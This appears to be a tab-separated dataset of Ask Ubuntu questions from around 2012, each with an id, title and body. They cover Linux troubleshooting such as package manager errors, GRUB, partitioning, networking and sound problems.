tech savvy but i 'm honestly pretty upset after struggling with this for hours . edit okay , i see the problem with the directory files ( showing the error i mentioned above when i try to click on them ) . i can only access my downloads , desktop , ect , through the backup that was created when i tried to install firestorm . it 's like that 's the real home now . how can i get it back to the way it was ? edit ubuntu has stopped working for me on reboot now . it does n't go past the login screen . this is exactly what happened when i had to uninstall it before after trying to install firestorm . maybe i 'm giving up too easily but i think i 'm just going to go back to windows . if this is what 's going to happen every time i innocently try to install a program then it 's just not worth it . i installed it specifically to run firestorm because windows sucks up a lot of cpu and causes lag . i still appreciate any input but this is just too much hassle for something that should n't be hard .
180859	error message for update-manager	i am completely new to ubuntu , and i am currently using 12.04 . when i run the update manager , the following error comes out : could not initialize the package information an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/sg.archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_translation-en e : the package lists or status file could not be parsed or opened . can someone help me to solve this problem ?
180860	regarding `` host key verification failed ''	i use ubuntu 10.04 in 2 virtual machines . in one machine i have installed hudson and another machine is to run klocwork . scenario is when i trigger a build in hudson , the script has to run successful and call the klocwork in vm2 . in the build script i have given the following command to call klocwork in machine 2. if [ $ klocwork = `` true '' ] ; then echo `` starting klocwork report ... '' sshpass -p 'password ' ssh ip-address `` sudo chmod 755 /local path/build_script_kw.sh ; /local path/build_script_kw.sh $ svnid $ version '' fi echo `` build successfully . '' when i run the script , i get host key verification failed error . please provide me a solution for this issue . thanks .
180861	'input not supported ' error and no grub after upgrading from 10.10 to 11.04	running windows vista and ubuntu 11.04 on an acer tower . was running 10.10 with kernel 2.6.35.32 , running great . upgraded to 11.04 from update manager , re-boot results in input not supported error , then a short delay , then 11.04 boots , but without grub menu . i would like to get to version 12.04 , but am afraid to continue until i get 11.04 running error-less .
180864	empty partition advice	i need some help . i 've been looking around the net and i ca n't find the answer to help me out specifically . i dual-booted ubuntu with windows 7 on the hd . i ran out of space in ubuntu and decided i wanted more . i shrank my windows partition . i now have an empty 50gb partition available . my problem is , i ran gparted and the extended partition containing ubuntu is all in the left . windows is in the middle . the empty space is to the right . should i move the windows to the left and merge the extended with the empty space ? or make a new partition on the empty space for ubuntu to access ?
180865	keyboard not detected when installing	ubuntu do not detect the keyboard on an older msi laptop . i have tried severel times to even nuke the hard disk and reinstall ubuntu - with the same result : even during installation ( when choosing the keyboard layout and setting up personal information ) ubuntu do not find the keyboard and i have to use the onscreen one . after installation i ca n't find the way to dectect the keyboard . what to do ?
180867	12.04 ca n't detect my d-link airtel net setter	i had purchased a d-link net setter and insert a airtel prepaid sim in it . i am using it in windows 7 but it ca n't be detected in 12.04 lts . i created one mobile broadband connection using a connection wizard , after that , it was not detected .
180872	installing mate desktop environment without installing the applications	i want to install mate desktop only , without applications . i already have apps from gnome 3 - nautilus , file-roller , gedit . but when i sudo apt-get install mate-core , it asks to install caja , pluma , engrampa etc . how to avoid them ?
180873	shopt works in command line , not found when run in a script	i 'm writing a script to copy some files around , and trying to use shopt -s dotglob to enable cp to copy dotfiles like .jshint and whatnot . i can run shopt -s dotglob directly at a bash prompt with no error . however , running the script throws the error : script.sh : 81 : script.sh : shopt : not found i 'm running this script in bash shell , with the shebang header # ! /usr/bin/env bash . error line : shopt -s dotglob cp -r $ temp/img/* $ target/img/ cp -r $ temp/js/* $ target/js/ cp -r $ temp/less/* $ target/less/ not finding anything helpful on google , any idea what the problem is here ?
180875	facing problem in download of tar files from kernel.org	i am working on a project i.e . developing/improving operating system scheduling for scalable multi core architecture . i was downloading linux kernel3.2.28 source code ( tar file ) from kernel.org whose size is 74mb . but when file is downloaded , it 's size becomes 45mb and when i am trying to open it , it is not opening . can you help me to solve this problem ?
180876	`` no server suitable for synchronization found '' error when trying to run `ntpdate`	i am trying to setup the ntp server on ubuntu machine . am breaking my head in this particular issue . getting an error ntpdate [ 5005 ] : no server suitable for synchronization found when doing the command ntppdate . can anyone please help me out in this ? /etc/ntp.conf : server 0.ubuntu.pool.ntp.org server 1.ubuntu.pool.ntp.org server 2.ubuntu.pool.ntp.org server 3.ubuntu.pool.ntp.org also when i gave command netstat -anltp | grep `` listen '' tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 1816/dnsmasq tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 939/sshd tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 1013/cupsd tcp 0 0 127.0.0.1:39558 0.0.0.0 : * listen 5529/rsession tcp 0 0 0.0.0.0:902 0.0.0.0 : * listen 1275/vmware-authdla tcp 0 0 127.0.0.1:47304 0.0.0.0 : * listen 5822/rsession tcp6 0 0 : ::80 : : : * listen 1400/apache2 tcp6 0 0 : ::22 : : : * listen 939/sshd tcp6 0 0 : :1:631 : : : * listen 1013/cupsd so what should i do so that it listens on 123 ? if i get output as port state service 123/udp open ntp if i give command nmap -p 123 -su -p0 192.168.36.198 , it means udp is open right ? then why does n't it show in the command to to show listening ports ?
180878	how can i create a movie from an .hdr file ?	i have generated few .hdr files using sketchup and v-ray . now i want to combine all those files to create a movie . well it seems the best option is to use photoshop , but i do n't have photoshop , and i do n't want it . can any one tell me about an open source software , well equipped to do this ? i can view these files in luminance hdr , but cant create a movie there .
180882	os-prober does n't find arch linux until i manually mount arch linux partition	title says everything . here is output of boot info script : http : //paste.ubuntu.com/1169338/ sudo os-prober returns only windows partition : sudo os-prober /dev/sda2 : windows 7 ( loader ) : windows : chain if i manually mount arch linux partition with nautilus , sudo os-prober returns windows and also arch linux partition : sudo os-prober /dev/sda2 : windows 7 ( loader ) : windows : chain /dev/sda6 : :arch : linux if os-prober do n't find arch linux partition , arch linux do n't show on the grub2 , so everytime kernel in ubuntu is updated i have to manually mount arch linux partition and run sudo update-grub . does anyone have any idea how to solve this problem ? p.s . : i use ubuntu 12.04 lts
180886	remove unity and install kde ?	how to fully remove unity desktop environment and associated files and dependencies from ubuntu 12.04 and have a pure kde installation ?
180888	update information is outdated	i ca n't remove the red triangle in the right upper corner of my desktop . when i type sudo apt-get update & & sudo apt-get upgrade i get the error message below : w : failed to fetch http : //ppa.launchpad.net/michael-gruz/canon/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/michael-gruz/canon/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how to fix my problem ?
180890	apt-get issue : duplicate software sources	i have a problem every time i run sudo apt-get update . the following is a output from the terminal : w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ precise/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_precise_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i need help in resolving the duplicate software source problem . any help will be greatly appreciated : - )
180893	gedit `` can not open display '' , on remote computer , using ssh - ubuntu 12.04	i am getting the following error message when using ssh to log into a remote machine : gedit : can not open display i am using ssh in - ubuntu 12.04 .
180894	is there any way to boost the audio output of ubuntu 12.04 lts ?	when i listen to music or play any video on firefox the audio stays very low despite of changing all the sound options to its maximum value in gnome alsa mixer . i have seen that when i use audacious with the equalizer on , the sound goes louder , but without that sound is very unsatisfactory .
180896	terminal not working	i ca n't type anything into the terminal . just nothing shows up in the terminal window no matter what i do . most web searching on the problem starts with , `` type -- - into terminal '' which of course is n't helping . anyone else have this problem ? what do i do ?
180899	should i install 32- bit operation system or 64-bit ?	i am going to use a computer with quadcore 1,5ghz cpu , 6gb ram , radeon hd 6520g + 7450m graphics card dual gpu , resolution is 1366 x 768 pixels . and how smoothly should 64/32 bit run on that machine ?
180901	uninstalling 12.04 to install 10.04	i would like to uninstall 12.04 on my asus netbook so that i can install 10.04 which i prefer . what is the procedure for the uninstall . tks .
180902	gnome evolution contacts over davmail to an micrsoft exchange with autehtication does not work	the problem is that my contacts are stored in an exchange 2007 server which needs authentication on login . but the auth data is not passed through davmail to exchange . ( checked with wireshark . ) is there a fix to get evolution and davmail combo to send the login to the exchange ? thunderbird/davmail contacts do work . the settings in evolution and davmail are like mentioned here .
180912	mail menu is empty after upgrade to ubuntu 12.04	after upgrading to ubuntu 12.04 , session menu and user menu were missing and the mail menu was empty . i followed the directions in this thread and the session and user menus appeared . but the mail menu is still empty . what can i do to get it working ? i tried these , sudo apt-get purge indicator-messages and sudo apt-get install indicator-messages after this the mail menu contents flickered for a second and disappeared again . note : the mail icon appears in the task bar but it us empty .
180918	recover lvm setup by reinstalling ubuntu	if i have a lvm set up on my `` data '' disks , will reinstalling ubuntu on the os disk allow me to recover the original lvm set up ? i 'm slightly worried that i wo n't be able to see any data on my disks after a reinstall .
180919	multiple ubuntu , windows how to make grub to detect them all ?	i have 4 ubuntu version on a system ( 11.04 and 11.10 both in 32 and 64 bit ) and also a few versions of windows , after a restore now i have the grub from an earlier version and it sees just a system ( 11.04 32bit ) . how can i install grub again and make it see all this operating systems ?
180922	how to gpg text on unity ?	once there was a gnome-applet in ubuntu ( seahorse ? ) which helped me with encryption/decryption of pgp text messages . it was able to encrypt or decrypt the clipboard . since unity i have no idea , how to integrate this applet into my desktop . what is the recommended way to encrypt/decrypt text messages like emails or just some text from the web ?
180925	how to setup static ip in ubuntu server 12.04 ?	sudo apt-get update sudo apt-get upgrade ifconfig sudo nano /etc/network/interfaces auto eth0 iface eth0 inet static address 192.168.1.150 netmask 255.255.255.0 network 192.168.2.0 broadcast 192.168.1.255 gateway 192.168.2.1 safe sudo nano /etc/resolv.conf do not edit this file by hand -- your changes will be overwritten # i add this nameserver 8.8.8.8 nameserver 8.8.4.4 sudo apt-get remove dhcp-client sudo /etc/init.d/networking restart *running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces *reconfiguring network interfaces ... ssh stop/waiting ssh start/running , process 1438 where is the mistake ? i 'm not lazy . i googled it for 3 days but without results . i tried everything . after reboot the /etc/resolv.conf file is flashing to the original state .
180929	mobile broadband device was detected before but now not any more	i am using a huawei e1731 mobile broadband device since few months now . i 've had no problem with it , after installing it it ran perfectly . however two hours ago suddenly the device is not detected anymore . the leds are still lit on the device but it does n't show up among my network interfaces . i have n't done anything special to my computer this day , just browsing the web , using skype and reading some pdf . i have n't downloaded anything nor have i done any updates . i tried unplugging and replugging the device , rebooting , rebooting with the device and without the device , no matter what i do , nothing seems to fix this . lsusb does not list the device : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0c45:63e0 microdia sonix integrated webcam bus 003 device 002 : id 0483:2016 sgs thomson microelectronics fingerprint reader what can have happened ? and how can i fix this ?
180937	maas - juju boostrap and ssh not found	today i want to juju boostrap so i do ssh-keygen and get this generating public/private rsa key pair . enter file in which to save the key ( /home/hsf/.ssh/id_rsa ) : key enter passphrase ( empty for no passphrase ) : ubuntu enter same passphrase again : ubuntu your identification has been saved in key . your public key has been saved in key.pub . the key fingerprint is : 7e : d2 : df:66 : f5:2f:92:02 : ad:10:67 : b7:10 : cd:33:03 hsf @ ubuntu-server the key 's randomart image is : + -- [ rsa 2048 ] -- -- + | e+ | | . * | | . + | | . + . | | +s+ . | | ... .o .| | .ooo . ..| | .o..o.+ .| | ..+..o| + -- -- -- -- -- -- -- -- -+ then i copy my public key in key.pub is like this : ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqc89zkec0yhwyuumjb6oxmlgmzh2ncvjmf0mjigodxn $ to the maas dashboard : press `` add ssh key '' and copy and add key . so now i want to bootstrap and i get this : 2012-08-27 13:02:02,923 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... 2012-08-27 13:02:05,935 error failed to launch machine /maas/api/1.0/nodes/node-3c4b1752-f031-11e1-bd44-001185e67955/ ; attempting to release . traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/launch.py '' , line 44 , in start_machine cloud_init = self._create_cloud_init ( machine_id , zookeepers ) file `` /usr/lib/python2.7/dist-packages/juju/providers/common/launch.py '' , line 95 , in _create_cloud_init cloud_init.add_ssh_key ( get_user_authorized_keys ( config ) ) file `` /usr/lib/python2.7/dist-packages/juju/providers/common/utils.py '' , line 84 , in get_user_authorized_keys raise lookuperror ( `` ssh authorized/public key not found . '' ) lookuperror : ssh authorized/public key not found . ssh authorized/public key not found . 2012-08-27 13:02:11,969 error ssh authorized/public key not found . i do n't know what to do . please help .
180939	ca n't update and install any software	i ca n't update my cache memory and ca n't install any new software . when i try to update , i get an error saying failed to download repository information check your internet connection . but the internet connection is perfect . even with terminal , the same error occurs . does anyone have a solution ?
180941	blocking multiple sites with /etc/hosts	by editing the hosts file and adding : 0.0.0.0 sitetoblock.com i can block that particular website . using the hosts file , is it possible to block every website except a few sites i specify ? wikipedia and dictionary.com would be whitelisted . if this is n't possible with /etc/hosts , would you recommend another method or app that would do something similar ? i do not want a browser plugin , but rather an os wide block .
180951	advanced partition plan for triple boot windows 7 , ubuntu , arch	currently i am running a windows 7 / ubuntu12.04 dual boot . but i would like to add some other linux distros like arch and slackware . windows will be used only for gaming ubuntu is for productivity arch or slackware only for experimenting and learning more about linux i want to have music and movies in one central place that can be accessed from windows and ubuntu . i am going to used emacs and vim in both linux systems it would be nice if there was some way to share their configuration files . for all that i have a single 500gb hdd available and i 'd like to have some advice how to partition it . after doing some research i think something like the following is needed : primary ( sda1 ) : ntfs windows 7 ( 80-100gb - games eat up so much space these days ) primary ( sda2 ) : /boot ( 200mb - grub ) logical : ( sda3 ) : ext4 / ubuntu ( 25-30gb - some space to bloat up ) ( sda4 ) : ext4 / arch ( 10 gb ) ( sda5 ) : ext4 /home ( some size gb - daily work , [ sensitive ] documents , projects and configuration files ) ( sda6 ) : ntfs data partition ( remaining space - mostly media files ) ( sda7 ) : swap ( 4gb = ram size ) another thing i thought about are seperate partitions for /root and /etc ? it 's the same machine and i am going to need the same settings for networks , administrative tasks and going to used mostly the same bash scripts and aliases , right ? are there special things regarding the order of the partitions ? what file system needs /boot to be ? any other things to consider ? oh and by the way : no , i do not want to run arch/slackware in a vm since i want to feel the speed and estethic that comes with living in a terminal-only world . this os will most likely never see a desktop environment : )
180952	no sound on 12.04	i have just installed the latest version and i have no sound . i tried all solutions i could find on the web , including drivers from the sound dev repository , running alsamixer , etc , but nothing helps . would someone please help ? i am new to ubuntu , i have no idea where to look . microphone works , and it seems to recognize my laptop 's on-board sound . marilyn2 description : notebook product : satellite p105 ( ) vendor : toshiba version : pspa0u-018006 serial : 46110668w width : 32 bits capabilities : smbios-2.4 dmi-2.4 smp-1.4 smp configuration : administrator_password=disabled boot=oem-specific chassis=notebook cpus=2 frontpanel_password=unknown keyboard_password=unknown power-on_password=disabled uuid=a03195e0-a4b9-da11-9504-001636272b4c *-core description : motherboard product : satellite p105 vendor : toshiba physical id : 0 version : not applicable serial : 1234567890 *-firmware description : bios vendor : toshiba physical id : 0 version : v1.70 date : 03/16/2006 size : 91kib capacity : 960kib capabilities : isa pci pcmcia pnp upgrade shadowing escd cdboot acpi usb biosbootspecification *-cpu:0 description : cpu product : genuine intel ( r ) cpu t2300 @ 1.66ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : 6.14.8 serial : 0000-06e8-0000-0000-0000-0000 slot : u2e1 size : 1ghz capacity : 1ghz width : 32 bits clock : 166mhz capabilities : boot fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx constant_tsc arch_perfmon bts aperfmperf pni monitor vmx est tm2 xtpr pdcm dtherm cpufreq configuration : id=1 *-cache:0 description : l1 cache physical id : 5 slot : l1 cache size : 16kib capacity : 16kib capabilities : asynchronous internal write-back *-cache:1 description : l2 cache physical id : 6 slot : l2 cache size : 2mib capabilities : burst external write-back *-logicalcpu:0 description : logical cpu physical id : 1.1 width : 32 bits capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 1.2 width : 32 bits capabilities : logical *-memory description : system memory physical id : c slot : system board or motherboard size : 2gib capacity : 3gib *-bank:0 description : sodimm ddr2 synchronous physical id : 0 slot : m1 size : 1gib width : 64 bits *-bank:1 description : sodimm ddr2 synchronous physical id : 1 slot : m2 size : 1gib width : 64 bits *-cpu:1 physical id : 1 bus info : cpu @ 1 version : 6.14.8 serial : 0000-06e8-0000-0000-0000-0000 size : 1ghz capacity : 1ghz capabilities : vmx ht cpufreq configuration : id=1 *-logicalcpu:0 description : logical cpu physical id : 1.1 capabilities : logical *-logicalcpu:1 description : logical cpu physical id : 1.2 capabilities : logical *-pci description : host bridge product : mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 03 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-display:0 description : vga compatible controller product : mobile 945gm/gms , 943/940gml express integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 03 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:16 memory : b0080000-b00fffff ioport:1800 ( size=8 ) memory : c0000000-cfffffff memory : b0040000-b007ffff *-display:1 unclaimed description : display controller product : mobile 945gm/gms/gme , 943/940gml express integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 03 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : b0100000-b017ffff *-multimedia description : audio device product : n10/ich 7 family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:44 memory : b0000000-b0003fff *-pci:0 description : pci bridge product : n10/ich 7 family pci express port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport:5000 ( size=4096 ) memory:80a00000-80bfffff ioport:80c00000 ( size=2097152 ) *-pci:1 description : pci bridge product : n10/ich 7 family pci express port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport:4000 ( size=4096 ) memory:80500000-807fffff ioport:80800000 ( size=2097152 ) *-network description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 02 serial : 00:13:02:3d : ca : e2 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.2.0-29-generic-pae firmware=15.32.2.9 ip=192.168.254.45 latency=0 link=yes multicast=yes wireless=ieee 802.11abg resources : irq:43 memory:80500000-80500fff *-pci:2 description : pci bridge product : n10/ich 7 family pci express port 3 vendor : intel corporation physical id : 1c.2 bus info : pci @ 0000:00:1c.2 version : 02 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport:3000 ( size=4096 ) memory:80100000-802fffff ioport:80300000 ( size=2097152 ) *-usb:0 description : usb controller product : n10/ich 7 family usb uhci controller # 1 vendor : intel corporation physical id : 1d bus info : pci @ 0000:00:1d.0 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:23 ioport:1820 ( size=32 ) *-usb:1 description : usb controller product : n10/ich 7 family usb uhci controller # 2 vendor : intel corporation physical id : 1d.1 bus info : pci @ 0000:00:1d.1 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:19 ioport:1840 ( size=32 ) *-usb:2 description : usb controller product : n10/ich 7 family usb uhci controller # 3 vendor : intel corporation physical id : 1d.2 bus info : pci @ 0000:00:1d.2 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:18 ioport:1860 ( size=32 ) *-usb:3 description : usb controller product : n10/ich 7 family usb uhci controller # 4 vendor : intel corporation physical id : 1d.3 bus info : pci @ 0000:00:1d.3 version : 02 width : 32 bits clock : 33mhz capabilities : uhci bus_master configuration : driver=uhci_hcd latency=0 resources : irq:16 ioport:1880 ( size=32 ) *-usb:4 description : usb controller product : n10/ich 7 family usb2 ehci controller vendor : intel corporation physical id : 1d.7 bus info : pci @ 0000:00:1d.7 version : 02 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:23 memory : b0004000-b00043ff *-pci:3 description : pci bridge product : 82801 mobile pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : e2 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list resources : ioport:2000 ( size=4096 ) memory : b0300000-b03fffff ioport:84000000 ( size=67108864 ) *-pcmcia description : cardbus bridge product : pcixx12 cardbus controller vendor : texas instruments physical id : 4 bus info : pci @ 0000:0a:04.0 version : 00 width : 32 bits clock : 33mhz capabilities : pcmcia bus_master cap_list configuration : driver=yenta_cardbus latency=176 maxlatency=5 mingnt=192 resources : irq:17 memory : b0304000-b0304fff ioport:2800 ( size=256 ) ioport:2400 ( size=256 ) memory:84000000-87ffffff memory:88000000-8bffffff *-firewire description : firewire ( ieee 1394 ) product : pcixx12 ohci compliant ieee 1394 host controller vendor : texas instruments physical id : 4.1 bus info : pci @ 0000:0a:04.1 version : 00 width : 32 bits clock : 33mhz capabilities : pm ohci bus_master cap_list configuration : driver=firewire_ohci latency=64 maxlatency=4 mingnt=3 resources : irq:17 memory : b0305000-b03057ff memory : b0300000-b0303fff *-storage description : mass storage controller product : 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) vendor : texas instruments physical id : 4.2 bus info : pci @ 0000:0a:04.2 version : 00 width : 32 bits clock : 33mhz capabilities : storage pm bus_master cap_list configuration : driver=tifm_7xx1 latency=64 maxlatency=4 mingnt=7 resources : irq:17 memory : b0306000-b0306fff *-generic description : sd host controller product : pcixx12 sda standard compliant sd host controller vendor : texas instruments physical id : 4.3 bus info : pci @ 0000:0a:04.3 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : driver=sdhci-pci latency=64 maxlatency=4 mingnt=7 resources : irq:17 memory : b0305800-b03058ff *-network description : ethernet interface product : pro/100 ve network connection vendor : intel corporation physical id : 8 bus info : pci @ 0000:0a:08.0 logical name : eth0 version : 02 serial : 00:16:36:27:2b:4c size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=half firmware=n/a latency=64 link=no maxlatency=56 mingnt=8 multicast=yes port=mii speed=10mbit/s resources : irq:20 memory : b0307000-b0307fff ioport:2000 ( size=64 ) *-isa description : isa bridge product : 82801gbm ( ich7-m ) lpc interface bridge vendor : intel corporation physical id : 1f bus info : pci @ 0000:00:1f.0 version : 02 width : 32 bits clock : 33mhz capabilities : isa bus_master cap_list configuration : latency=0 *-ide description : ide interface product : 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] vendor : intel corporation physical id : 1f.2 bus info : pci @ 0000:00:1f.2 logical name : scsi0 logical name : scsi1 version : 02 width : 32 bits clock : 66mhz capabilities : ide pm bus_master cap_list emulated configuration : driver=ata_piix latency=0 resources : irq:19 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport:18b0 ( size=16 ) *-disk description : ata disk product : fujitsu mhv2160b vendor : fujitsu physical id : 0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 0000 serial : nu09t6325rjy size : 149gib ( 160gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=486d5b3c *-volume:0 description : windows ntfs volume physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 version : 3.1 serial : 2e87a6f3-84dc-3544-8db8-080f29946e53 size : 63gib capacity : 63gib capabilities : primary bootable ntfs initialized configuration : clustersize=4096 created=2009-09-02 21:29:45 filesystem=ntfs state=clean *-volume:1 description : extended partition physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 size : 85gib capacity : 85gib capabilities : primary extended partitioned partitioned : extended *-logicalvolume:0 description : linux swap / solaris partition physical id : 5 logical name : /dev/sda5 capacity : 2037mib capabilities : nofs *-logicalvolume:1 description : linux filesystem partition physical id : 6 logical name : /dev/sda6 logical name : / capacity : 83gib configuration : mount.fstype=ext4 mount.options=rw , relatime , errors=remount-ro , user_xattr , barrier=1 , data=ordered state=mounted *-cdrom description : dvd-ram writer product : dvdram gma-4082n vendor : hl-dt-st physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : hv02 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-serial unclaimed description : smbus product : n10/ich 7 family smbus controller vendor : intel corporation physical id : 1f.3 bus info : pci @ 0000:00:1f.3 version : 02 width : 32 bits clock : 33mhz configuration : latency=0 resources : ioport:18c0 ( size=32 ) *-remoteaccess unclaimed vendor : intel physical id : 1 capabilities : inbound
180953	lightdm and introductory screen	how can i set original introductory screen and lightdm , they changed after installing the system administrator kde .
180957	how do i gain root privileges ?	how do i gain root privileges in ubuntu desktop 12.04 ? i installed to a usb stick to try it out . now when i installed it on a vm , i do n't have the same options as i did on the usb stick . such as opening remote desktop , installing drivers , and some of the video capabilities .
180971	large file copy speed issue	i have looked at the various email regarding speed of copying large files and it has been coming on for a long time . i have a usb 3 memory stick and a laptop that dual boots into windows 7 64bit or ubuntu linux 64bit . when attempt to copy large files in windows , it goes through quite quickly . when i copy the same files using ubuntu , it always takes a lot longer than windows . i am using all the same hardware as well as the same files . in linux , the copy transfer rate starts at about 30mb/s and reduces down to 10mb/s . i have notices similar type of reduction of speed when i copy large file from linux to linux over the network ( samba share ) . when i copy the same files using a windows client and a linux server over samba it flies . any help will be appreciated .
180974	ubuntu software center : failed to download package files ?	i am not able to download any application from software center , it shows me this message failed to download package files neither am i able to update .
180975	i lost all applications on dash home and software centers buffers , how to retrieve it ?	i am using 12.04 in eeepc netbook . i keep on receiving a software update and installed it . this evening , as i try to open the dash home and search for the installed application such as skype , calculator , microsoft wword , etc. , nothing appears , everything is gone . only the files and folders in my home remains . i also tried to open the ubuntu software center but it buffer . i do n't have any idea how to fix this . please help me restore all the installed applications .
180981	how to log processes in daemon-mode ?	i would like to save the standard output of the program motion in a text file . if i do n't use motion in daemon-mode i would simply do it by : motion > log.txt but what is the equivalent when i run it in daemon-mode ? i can not specify implicit logging at least according to motion 's man page .
180983	how do i open adobe files ?	i can not open adobe files . an asci filter options message pops up and the text is unreadable . i was able to open files but something changed . i am not a computer guru and need help .
180984	external display is not working under ubuntu with a thinkpad w530	i have a new thinkpad w530 . it has a k2000m graphics card ( with optimus ) and a intel chipset graphic . i ca n't connect an external display . here is what i tried with more or less success . 1 ) installed bumblebee : it allows me to run cuda codes but no external display . moreover , my graphic card is not detected as the correct one ( q2100 instead of k2000m ) . 2 ) installed hybrid-screenclone and follow this http : //sagark.org/optimal-ubuntu-graphics-setup-for-thinkpads/ : it allows to have an external displays but it is very slow and not automatic ( no screen detection and no resolution auto-detection ) . 3 ) installed thinkdisp : it is supposed to simplify the previous point but it does n't work on my computer . 4 ) installed new driver 304.37 : it is supposed to support my k2000m but it does n't work . my graphic card is not detected and external display are still not working . here is where i am . nb : the rest ( keyboard , wifi ) is working perfectly . i think a lot of people are facing the same problem but there is a lack of unified documentation .
180986	how to install pcmanfm 1.0	i use lubuntu 12.04 . the new pcmanfm 1.0 version is not yet in the repos ; how to get it ?
180990	what is zeitgeist used for ?	for what does ubuntu use zeitgeist ? i am using ubuntu right now and found out that ubuntu desktop ( so unity ) work with zeitgeist core and much more . are there differences between the film zeitgeist and the package zeitgeist . does this go back to the word 's original meaning ?
180993	unable to install evolution on xubuntu 12.04	i had evolution 3.2.3 working on xubuntu 12.04 . but then i was tempted to upgrade my evolution to the latest and greatest so i did a bit of searching and added the following command : sudo apt-add-repository ppa : janvitus/gnomestracciatella and sudo apt-get update and sudo apt-get install evolution but that failed so i removed the ppa and tried to install the default evolution sudo apt-get install evolution but that fails too with following output evolution : depends : libevolution ( < 3.3 ) but 3.4.2-1ubuntu3.1~stracciatellappa+precise1 is to be installed depends : evolution-data-server ( < 3.3 ) but 3.4.2-1~stracciatellappa+precise1 is to be installed recommends : evolution-plugins but it is not going to be installed e : unable to correct problems , you have held broken packages . can anybody help me fix the issue and install evolution ? we have ms outlook at work and i really need to get it working .
180996	what is apt-cache used for ?	can anyone please define what exactly the apt cache is ?
